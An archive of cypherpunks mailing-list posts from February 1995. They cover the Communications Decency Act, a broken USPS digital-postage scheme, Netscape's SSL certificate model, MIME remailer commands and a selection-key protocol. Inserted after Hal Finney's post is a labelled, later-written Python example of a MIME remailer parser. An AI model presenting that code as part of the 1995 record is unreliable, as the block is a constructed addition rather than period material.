Date: Wed, 8 Feb 95 06:59:37 PST
To: cypherpunks@toad.com
Subject: Re: WSJ Article on Sen. Exon's Legislation
In-Reply-To: <199502081435.GAA06488@ix3.ix.netcom.com>
Message-ID: <199502081457.GAA23202@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   he says, adding that a failure by the government to act 
   would be "an open invitation to some of the hardcore pornography getting 
   into our homes."

I don't know about the rest of you, but I'd rather have that ol'
hardcore pornography in the privacy of our homes, where it belongs,
than in public, where innocent children might gain access to it.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haeberli@apple.com (Martin Haeberli)
Date: Wed, 8 Feb 95 08:06:08 PST
To: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Subject: Re: USPO & Digital Postage/E-Cash Project
Message-ID: <v02110101ab5e954ccb48@[198.68.90.31]>
MIME-Version: 1.0
Content-Type: text/plain


Dale,

I would appreciate any citations you can offer which:
-Describe the proposed system in some detail
-Describe the weaknesses identified by the CMU team.

Also, this group might want to know that CMU has (perhaps independently)
done work in this area over two years ago.  It may well be that the team at
CMU which did the USPO contract research is the same team that proposed
digital postage in a research paper in that time frame, and it may well be
that their system would withstand a much more rigorous attack.  I'm afraid
I've lost the precise citation, but I found the report browsing the CMU
tech reports server about 18 months ago.

Martin

At 10:25 PM 02/07/95, Dale Harrison (AEGIS) wrote:
>The US Post Office just killed a project that would have created a
>digital postage/e-cash system.  This would have been a digital
>replacement for the Pitney-Bowes style Postage Metering machines.  To use
>a PM machine one has to take the entire machine physically to a Postal
>Station and purchase some fixed dollar amount of postage.  The Postal
>clerk unseals and unlocks the machine, dials in the amount of postage
>purchased and then relocks and reseals the machine.
>
>This mechanical system would have been replaced by a serial-port dongle
>and a piece of software.  The dongle would contain an EEPROM in a
>replaceable button (made by Dallas Semiconductor) into which would be
>loaded data indicating the amount of postage that had been purchased and
>not yet used.  The software package would be able to print the address,
>postage seal, routing codes, etc directly on the envelope via a laser
>printer and decrement the amount of available postage left in the
>dongle.  In the original test, customers would have to take the dongle
>to a Postal Station to purchase additional postage, but the ultimate
>goal was to have been to have a commercial dial-up service available
>that one could dial into and purchase additional postage directly.
>
>A proof-of-concept prototype was developed in VB and a production
>prototype was then developed in VC++.  Unfortunately the crypto wasn't
>very strong.  The USPO contracted with Carnegie-Mellon to try and break
>the system and they were able to within a couple of weeks.  USPO then
>killed the project.
>
>
>Dale H.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 8 Feb 95 09:20:11 PST
To: Hal <perry@imsi.com
Subject: Re: MIME based remailing commands
In-Reply-To: <23676.792177411.1@nsb.fv.com>
Message-ID: <ojCAH3b0Eyt5QxSaNd@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from junk.interesting: 7-Feb-95 Re: MIME based remailing co..
"Perry E. Metzger"@imsi. (2553)

> > > It is being remailed via a MIME-based structure where two new content types
> > > are defined: multipart/remail and application/remail-commands.  The
> > > multipart/remail type is supposed to be composed of two parts, the
> > > application/remail-commands part which has remailer commands, and the
> > > other part which is the "payload" to be remailed.

Perhaps you might consider writing up an informational RFC to define
these types?  I think that would be very useful. -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brett Turcotte" <turcotte@io.com>
Date: Wed, 8 Feb 95 06:42:12 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <199502081442.IAA29984@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb. 8, Samuel Kaplin wrote:
> The question is: What is obscene? What the community in NYC considers 
> obscene is sure a lot different than what the community in Elk River 
> Minnesota considers obscene. (They've been trying to eject their one XXX 
> bookstore for years now while NYC has the American Museum of Pornography 
> at 42nd Street ;) ;) :) ) As you can see, obscenity depends where you are 
> geographically located, at least according to our highest court. If 
> community standards say it is obscene then it is. They never legally 
> defined what constitutes something as being obscene or an obscenity.
> 
> Sam
> 

And don't forget the recent case where the operators of a California 
bulletin board were prosecuted and convicted in court in 
Memphis....whereas they never would have been convicted under the 
community standards in California.  You want to talk about 
scary....there is a section in Robert Heinlein's "Job: A Comedy of 
Justice" where the protagonist describes some "moral" codes that they 
got passed...one of them was having the community standards of the 
median size community of the state apply to all communities in the 
state.   What's the betting out there that this is what would 
ultimately happen under these kinds of bills?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Wed, 8 Feb 95 06:14:02 PST
To: cypherpunks@toad.com
Subject: Exon in WSJ
Message-ID: <199502081408.AA15271@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Today's WSJ - Page B1 - Above the fold

Government Tackles a Surge of Smut on the Internet

"On-line computer services are bracing for a government crackdown against
smut on the Internet -- even though nobody's sure if the Net *can* be
regulated."


Accompanying article on how demand for porno overwhelms sites that try to
supply it.

DCF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzjPtIVO4r4sgSPhAQF9IgP/Rv8haetVjaFqbd4j3QMSqAw7J219jej1
ZQTBujNlgFMb94TZSUy/X7oReAutJyaiWDvSyS7Nmnxx0xGAWMgR/8K9SlfJleia
Kja7H+cC7DODhGNMo3AUkn+shqKzz/idVZb3EiF1gtP3Xsm5DA5r9vqZyVZlFHxR
1IkGmN76Ax0=
=5UtC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 8 Feb 95 08:02:11 PST
To: cypherpunks@toad.com
Subject: Email Add's of Senators?
Message-ID: <v01510103ab5e8d499d2f@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        Anyone have a list of these? Do they exist? It would be very helpful if they do and someone has a list or a pointer to a list, as my campus is gearing up a petition signing campaign against this S.314.
Thanks in advance,
- -Jaeson
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLzjdKObIUsJnAZfNAQEknwQA1malQkHdtMdX5okXYd2W/nY29gWr+ICM
cflNswC7ABV3wtmkMEACxP1geLXHI7zyqRWF3h6z23eqeOycYVZTfNKwDD8DykW0
fV+kru2dMuhhRihvTmH6ztdF9QCfB4LIAN38+GP0H0NFkRgZUs8dIXcHJh//pSec
F5bt7iDjwXw=
=vjyH
-----END PGP SIGNATURE-----

_____________________________________                  
{-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-}
{-:      www server: http://josaiah.sewanee.edu/         :-}
{-: Finger 'jme@josaiah.sewanee.edu' for my Public :-}
                                        PGP block.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 07:15:51 PST
To: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Subject: Re: USPO & Digital Postage/E-Cash Project
In-Reply-To: <199502080625.WAA20933@ix3.ix.netcom.com>
Message-ID: <9502081514.AA09856@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Dale Harrison (AEGIS) says:
> This would have been a digital replacement for the Pitney-Bowes style
> Postage Metering machines.  To use a PM machine one has to take the
> entire machine physically to a Postal Station and purchase some
> fixed dollar amount of postage.  The Postal clerk unseals and
> unlocks the machine, dials in the amount of postage purchased and
> then relocks and reseals the machine.

This is not the only way to get postage in postage meters. Some P-B
machines also let you buy postage by phone.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Wed, 8 Feb 95 07:20:36 PST
To: cypherpunks@toad.com
Subject: MBONE access needed
Message-ID: <9502081520.AA05523@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, guys!

I need to get MBONE access in New York City or nearby this weekend in
order to deliver a presentation for the Cypherpunks meeting this
Saturday on IPSP. If anyone in New York can provide such access,
please get in touch with me ASAP; the site that I thought I could use
has sadly become unavailable...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: System Operator <system@decode.com>
Date: Wed, 8 Feb 95 09:08:22 PST
To: cypherpunks@toad.com
Subject: Re: Seals and Sealing Waxes
Message-ID: <umN8Zc1w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain


chen@intuit.com (Mark Chen) writes:

> with the requisite proclivities).  I only have a hardcopy, though if
> enough people are interested, I might be persuaded to scan some of it
> in.

This appears to be an appropriate point for me to extend an offer
to scan any cypherpunk material for this list and/or archives that may
be appropriate. I have a Hewlett-Packard ScanJet IIcx with the
Automatic Document Feeder attachment, and Caere's OmniPro OCR software,
as well as Microsoft Office and WordPerfect 6.0.


Dan
dan@decode.com

--
system@decode.com (System Operator)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NIEHS Autoresponder <usenet@jeeves.niehs.nih.gov>
Date: Wed, 8 Feb 95 07:38:43 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <9502081538.AA05136@jeeves.niehs.nih.gov>
MIME-Version: 1.0
Content-Type: text/plain


Your Usenet test article was received here at the news gateway machine for
the National Institute of Environmental Health Sciences, in Research Triangle
Park, North Carolina, USA 35 47 N by 78 38 W.  The NIEHS newsadmins can 
be reached via e-mail at usenet@news.niehs.nih.gov.
Please note that we do not offer news access to sites outside of our 
organization.

If you're a newsadmin and you'd like to run your own autoresponder, this one
is available from ftp://ftp.cccd.edu/pub/usenet/innautorespond.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

Path: jeeves.niehs.nih.gov!darwin.sura.net!news.udel.edu!udel!news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Wed, 8 Feb 95 10:52:26 PST
To: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Subject: Re: skronk
In-Reply-To: <9502080951.ZM27700@warp.mcom.com>
Message-ID: <199502081852.KAA01719@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
# FYI:
# 
# If you haven't already, I suggest you take a look at the SSL spec
# (http://home.mcom.com/info/SSL.html)

[ carbon to cypherpunks, whom i think would be interested]

i've been looking at that.  

It seems that a special port has to be allocated for each TCP service.
So it's not clear to me how to find out if others on the net offer SMTP
with SSL, or how I can put SSL into my X11 clients & server.  You see
what I'm getting at?

It also looks like some heavy equipment is necessary to manage these
RSA certificates.  Is there anything like PGP's keyring management for
manipulating my web-of-trust?  Where do I find the docs?

# It does what you are trying to accomplish (I think), and it is already deployed
# in production code (the Netscape client and server products). In addition, we
# announced this week a free (for non-commercial use) reference implementation.
# The code will be out on the net as soon as the lawyers are happy :-)

aha ... that's the missing link.  I'd certainly like to add it to the
protocols that SKRONK advertizes and negotiates, but doing my own
implementation of these complex protocols, and building machinery for
using non-PGP certificates, was way more than I could handle.

Please beat your lawyers to a pulp, until they make it useful for us.
If I can't create generally useful things with it, and share it with
thousands of others on the net for free, it's not going to be used by
the cypherpunk community.

I recommend you put your reference implementation in the public domain
(except for the RSAREF component).  Or take Matt Blaze's crypto
offerings from AT&T as your model.  


		best regards, strick







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick@techwood.org
Date: Wed, 8 Feb 95 11:02:25 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502081702.MAA06532@libws3.ic.sunysb.edu>
Message-ID: <199502081902.LAA01787@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


# > > I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
# > > v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't

individual words can be "indecent", but not obscene.

obscene refers to the content of the work as a whole, and would
be very difficult to attain with a few dirty words.

# > > say on television" skit and was taken to court. The court ruled that there
# > > were some obscene things which could be censored, but other things were

All obscene things are censored on broadcast radio & TV.  
Massive penalties for broadcasting obscene material.

# > > indecent so could at most be relegated to late night hours (and they've
# > > struck down laws banning indecency 24 hours... I think some stations are
# > > suing with the claim that such relegation constitutes censorship).

In the U. S., you have a first amendment right to indecent speech.

The question of a late-night "safe harbor" for indecent speech on the
air is about when children are likely to be listening.  First
amendment rights apparently don't apply to children who are listening
to the radio.  

Right now there is a "safe harbor" from around 10pm (or is it 9pm?)
thru 6am, but this changes regularly, usually as a result of "case law"
(someone being prosecuted under next month's rules, not this month's)

				strick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Wed, 8 Feb 95 11:37:44 PST
To: strick@techwood.org
Subject: Re: skronk
In-Reply-To: <199502081852.KAA01719@gwarn.versant.com>
Message-ID: <9502081137.ZM28317@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 8, 10:52am, strick@techwood.org wrote:
> Subject: Re: skronk
> THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
> # FYI:
> #
> # If you haven't already, I suggest you take a look at the SSL spec
> # (http://home.mcom.com/info/SSL.html)
>
> [ carbon to cypherpunks, whom i think would be interested]
>
> i've been looking at that.

good!

> It seems that a special port has to be allocated for each TCP service.
> So it's not clear to me how to find out if others on the net offer SMTP
> with SSL, or how I can put SSL into my X11 clients & server.  You see
> what I'm getting at?

It turns out you want separate ports for each ssl-ized service because that way
the sysadmin types and the firewall guards are happy. They hate multiplexed
protocols because the standard off the shelf router equipment can't deal with
it.

> It also looks like some heavy equipment is necessary to manage these
> RSA certificates.  Is there anything like PGP's keyring management for
> manipulating my web-of-trust?  Where do I find the docs?

You are right here. However, our observation is that an interesting chunk of
the world is moving towards using X.509 based certificate infrastructures for
many things. Everybody wants digital signatures and the related capabilities.
For more info, feel free to wade into the X.500 specs (not recommended for the
timid or weak of stomach :-), or go poke around on www.rsa.com and look into
their pkcs specs.

> # It does what you are trying to accomplish (I think), and it is already deployed
> # in production code (the Netscape client and server products). In addition, we
> # announced this week a free (for non-commercial use) reference implementation.
> # The code will be out on the net as soon as the lawyers are happy :-)
>
> aha ... that's the missing link.  I'd certainly like to add it to the
> protocols that SKRONK advertizes and negotiates, but doing my own
> implementation of these complex protocols, and building machinery for
> using non-PGP certificates, was way more than I could handle.
>
> Please beat your lawyers to a pulp, until they make it useful for us.
> If I can't create generally useful things with it, and share it with
> thousands of others on the net for free, it's not going to be used by
> the cypherpunk community.
>
> I recommend you put your reference implementation in the public domain
> (except for the RSAREF component).  Or take Matt Blaze's crypto
> offerings from AT&T as your model.

The implementation will be out very shortly (it's already done and working). It
will be free for non-commercial usage, so hopefully most of the cypherpunks
will be happy (if there is such a state of affairs mind you :^)

We won't be having any of the copy-leftish stuff that is in the RSAREF license
- like not fiddling with the api, and having to give us back your hacks using
it...Of course we want to hear about what people are doing with it (that's
another purpose for the ssl-talk mailing list).


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 8 Feb 95 12:02:56 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <g53ElKjqRy8I078yn@mirage.skypoint.com>
Message-ID: <Pine.3.89.9502081135.A7848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995, Samuel Kaplin wrote:
> I find it amazing that CPR and EFF 
> haven't picked this up yet.

Really?
 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 8 Feb 95 09:03:00 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SV4.3.91.950208035054.26559A-100000@mirage.skypoint.com>
Message-ID: <199502081702.MAA06532@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> > I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
> > v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't
> > say on television" skit and was taken to court. The court ruled that there
> > were some obscene things which could be censored, but other things were
> > indecent so could at most be relegated to late night hours (and they've
> > struck down laws banning indecency 24 hours... I think some stations are
> > suing with the claim that such relegation constitutes censorship).
> > 
> > Don't remember their exact formulation, which isn't very exact anyway.
> > 
> 
> The question is: What is obscene? What the community in NYC considers 
> obscene is sure a lot different than what the community in Elk River 
> Minnesota considers obscene. (They've been trying to eject their one XXX 
> bookstore for years now while NYC has the American Museum of Pornography 
> at 42nd Street ;) ;) :) ) As you can see, obscenity depends where you are 
> geographically located, at least according to our highest court. If 
> community standards say it is obscene then it is. They never legally 
> defined what constitutes something as being obscene or an obscenity.

The definition is not entirely up to "community standards". I think the
court defined it loosely as 'material regarding sexual and excretory
functions' which appeals to "prurient interests".

Anyhow, they have enough of a national "standard" for the FCC to crack
down on broadcasters who breach the rules.

Of course geographic community standards are problematic too with
telecommunications since postal inspectors from Tennessee can call
up adult bulletin boards in California...

> 
> Sam
> 

Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 8 Feb 95 12:25:23 PST
To: jpp@markv.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502072138.aa29510@hermix.markv.com>
Message-ID: <Pine.3.89.9502081213.A7848-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Feb 1995 jpp@markv.com wrote:
 
> Uh oh!  Egg on my face.  Will someone explain to me how the amendments
> in S.314 make owners of ISPs or other computer systems liable for
> 'bad' data?  I apologize for my previous uncalled for (so it seems to
> me now) ranting.


 (A) by striking out `telephone' in the matter above
        subparagraph (A) and inserting `telecommunications device'; 
 (B) by striking out `makes any comment, request,
        suggestion, or proposal' in subparagraph (A) and inserting
        `makes, transmits, or otherwise makes available any comment, request,
                ^^^^^^^^^^
         suggestion, proposal, image, or other communication'; 

This appears to make ISPs responsible for content.

It makes them responsible for something that they cannot 
control without violating people's privacy.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 Feb 95 12:25:47 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <199502081852.KAA01719@gwarn.versant.com>
Message-ID: <199502082025.MAA00565@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
># It does what you are trying to accomplish (I think), and it is already deployed
># in production code (the Netscape client and server products). In addition, we
># announced this week a free (for non-commercial use) reference implementation.
># The code will be out on the net as soon as the lawyers are happy :-)

When we last left this story, only certificates from a few (one?)
signatory authorities were going to be accepted by Netscape clients.
Would this mean that competitors offering Netscape servers would have to
go to Netscape to get their keys signed in order to interoperate with
existing Netscape clients?  I think this is too limiting.

People should be able to choose their own key signers.  This should be a
configuration option.  It should not be compiled into the client!  That
hurts your own flexibility as well as interfering with interoperability.

Can I use this reference implementation and set up a SSL-compatible
service today, or do I have to go to you and/or everyone's friends at RSA
and get a signature first?  As long as it is the latter I think that SSL
is not going to be able to be a well-established standard.  People are
going to resent having to register with the authorities in order to set
up a secure web page.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 Feb 95 12:38:30 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <23676.792177411.1@nsb.fv.com>
Message-ID: <199502082037.MAA02640@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <nsb@nsb.fv.com> writes:

>Excerpts from junk.interesting: 7-Feb-95 Re: MIME based remailing co..
>"Perry E. Metzger"@imsi. (2553)

>> > > It is being remailed via a MIME-based structure where two new content types
>> > > are defined: multipart/remail and application/remail-commands.  The
>> > > multipart/remail type is supposed to be composed of two parts, the
>> > > application/remail-commands part which has remailer commands, and the
>> > > other part which is the "payload" to be remailed.

>Perhaps you might consider writing up an informational RFC to define
>these types?  I think that would be very useful. -- Nathaniel

Well, that was just an example; I was making those names up off the top
of my head in order to concretize what I understood Perry was suggesting.

I can see that putting remailer commands into a specific part of a MIME
multipart message has some advantages.  Right now we are basically
having the remailing commands be mail header fields.  But really people
aren't supposed to just make up new fields like that.  I think the
"name space" of these fields is protected somewhat more than many other
aspects of communication protocols on the net.  Is there precedent for
adding service-by-mail functionality in this way?  I am not completely
comfortable with it.  And as we think of new functionality and new
commands they all have to get added at this top level, the same
visibility and name space as "Subject", "From", and "To".

OTOH it does have the advantage that it is easy to do, at least with the
"::" pasting token idea (which perhaps would need to be documented in its
own right).

If we did use a separate message part we'd have our own little name space
to use, with no fears of conflicting with someone else.  (Maybe "Latency"
might be used in a future extension of RFC822 for some other meaning than
what we are using it for.)  I am not sure what has to be done to get an
RFC approved but I suspect that adding mail header fields would be much
more likely to hit opposition than adding yet another MIME type.

What does Mixmaster use for its commands?  Does it use "::" followed by
Anon-Send-To: and such?  Or some other format?  Maybe it should be made
MIME compliant from the beginning.  This way we are moving with the
current, the flow of the net, rather than across it.

Hal
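
[Added example, not part of Hal's message or of any remailer's code: a sketch of the two-part structure discussed above, using the made-up type names multipart/remail and application/remail-commands from the thread. The addresses, the "+2:00" latency value and the extra outer "Latency" header are constructed; the point shown is that commands live in their own name space and nothing from the outer RFC 822 header leaks into the forwarded message.]

```python
from email import message_from_string
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
from email.mime.text import MIMEText

# Commands this example remailer accepts; both names appear in the thread.
KNOWN_COMMANDS = {"anon-send-to", "latency"}


def build_remail(commands, payload_text, outer_headers=None):
    """Sender side: wrap commands and payload in one multipart/remail message."""
    outer = MIMEMultipart("remail")
    for name, value in (outer_headers or {}).items():
        outer[name] = value
    cmd = MIMENonMultipart("application", "remail-commands")
    cmd.set_payload("".join(f"{k}: {v}\n" for k, v in commands.items()))
    outer.attach(cmd)
    outer.attach(MIMEText(payload_text, "plain"))
    return outer.as_string()


def parse_commands(text):
    """Parse 'Name: value' lines; reject anything outside the private name space."""
    commands = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, sep, value = line.partition(":")
        key = name.strip().lower()
        if not sep or key not in KNOWN_COMMANDS:
            raise ValueError(f"unknown or malformed command line: {line!r}")
        if key in commands:
            raise ValueError(f"duplicate command: {key}")
        commands[key] = value.strip()
    if "anon-send-to" not in commands:
        raise ValueError("no Anon-Send-To command")
    return commands


def split_remail(raw):
    """Remailer side: return (commands, payload part) or raise ValueError."""
    msg = message_from_string(raw)
    if msg.get_content_type() != "multipart/remail" or not msg.is_multipart():
        raise ValueError("not a multipart/remail message")
    parts = msg.get_payload()
    if len(parts) != 2:
        raise ValueError("multipart/remail must have exactly two parts")
    cmd_part, payload_part = parts
    if cmd_part.get_content_type() != "application/remail-commands":
        raise ValueError("first part must be application/remail-commands")
    text = cmd_part.get_payload(decode=True).decode("ascii")
    return parse_commands(text), payload_part


def forward(raw):
    """Build the outgoing message from the payload part and the commands only.

    The outer headers (From, Subject, any unrelated 'Latency') are never
    copied, so they cannot identify the sender or be mistaken for commands.
    """
    commands, payload_part = split_remail(raw)
    payload_part["To"] = commands["anon-send-to"]
    return payload_part


# Constructed sample input.
SAMPLE = build_remail(
    {"Anon-Send-To": "alice@example.invalid", "Latency": "+2:00"},
    "hello\n",
    outer_headers={"From": "bob@example.invalid", "Subject": "secret",
                   "Latency": "5"},  # unrelated outer header with the same name
)

if __name__ == "__main__":
    print(forward(SAMPLE).as_string())
```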




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Wed, 8 Feb 95 12:44:14 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Judges-L FAQ
Message-ID: <199502082043.MAA21652@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text



It has come to my attention that the Judges-L FAQ is being distributed
by someone who obtained it on this list, and being sent to people made
to look as if it has issued from David Stodolsky.  

I must inform you that this FAQ is copyrighted material, and 
you are requested not to distribute it. 


-Craig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 8 Feb 95 12:46:20 PST
To: cypherpunks@toad.com
Subject: Re: Selection key crypto protocol trial balloon
In-Reply-To: <J84c2c4w165w@dxm.ernet.in>
Message-ID: <199502082045.MAA03683@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in (Rishab Aiyer Ghosh) writes:

>wcs@anchor.ho.att.com writes:

>> I'm not sure I really believe it's workable, but what it does
>> sound a bit like is CDMA spread-spectrum, which lets a bunch of

>Um no. The main thing is that what is extracted with the selection key is
>_different_ from what was put in...

Let me get straight where we are.  Rishab's concrete proposal was not an
implementation, but rather a set of requirements.  There was no
suggestion about any specific algorithms that would meet those
requirements, right?  The question is whether any such algorithm could
exist.

It is hard for me to see how this could possibly work.  The message
receiver sends this "selection key" to the intermediary, and that somehow
pulls out the saved message, but in a form such that the intermediary
doesn't recognize it.  And the intermediary himself can't tell exactly
which message is produced.  But it is nevertheless exactly the message
which was meant for this particular receiver.

The thing is, the receiver does not have much more information than the
intermediary.  At best he knows a secret key which may help decrypt the
message in some way.  But I don't see how that can be used to pull out
the message data since it can't be revealed to the intermediary.

I can't really prove that this is impossible, but it certainly looks that
way.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>
Date: Wed, 8 Feb 95 13:09:44 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: skronk
In-Reply-To: <199502081954.OAA22660@bwface.bwh.harvard.edu>
Message-ID: <9502081309.ZM28575@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 8,  2:54pm, Adam Shostack wrote:
> Subject: Re: skronk
> 	Will there be a commercially licensed version, so that things
> built on SSL can be used in freeware and payware?  (Like the recently
> announced commercial version of RSAREF)
>
> 	Actually, make that "When will there be.." since otherwise SSL
> will be yet another standard one company uses.  Such standards are
> less than useful.

Yes, there will be. We haven't formalized it yet, but we have been getting
enough interest to warrant it. Understand that this is not the main thrust of
our business (selling source code), so it will certainly take some time to put
it all together.


-- 
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 13:42:13 PST
To: kkirksey@world.std.com (Ken Kirksey)
Subject: Re: Four Horsemen
In-Reply-To: <199502082012.AA18319@world.std.com>
Message-ID: <199502082138.NAA17319@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ken Kirksey wrote:

> Just a quick question:  someone asked me the other day what the "Four
> Horsemen of the Infocalypse" were, and I told him
> 
>   1) Drug Dealers
>   2) Terrorists
>   3) Pedophiles
>   4) Pornographers
> 
> Did I get it right, or did I have a synaptic misfire somewhere along
> the line?

I usually just lump pedophiles and child pornographers together and
don't separately mention "normal" pornographers, as there's not much
on-line that competes with "Hustler." (The AA case, though, makes
conventional pornography a Horseman.)

Usually I also cite "money launderers" as the Fourth Horseman. This
lumps in tax evaders, etc.

But, now that we know what the Four Horsemen are, what's in the Seven
Vials? And since the British spelling and pronunciation is "phial,"
which sounds like "file" (but which has a different root: vial vs.
filum), we could call these the "seven files."

(Not to be confused with the "seventh veil.")

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
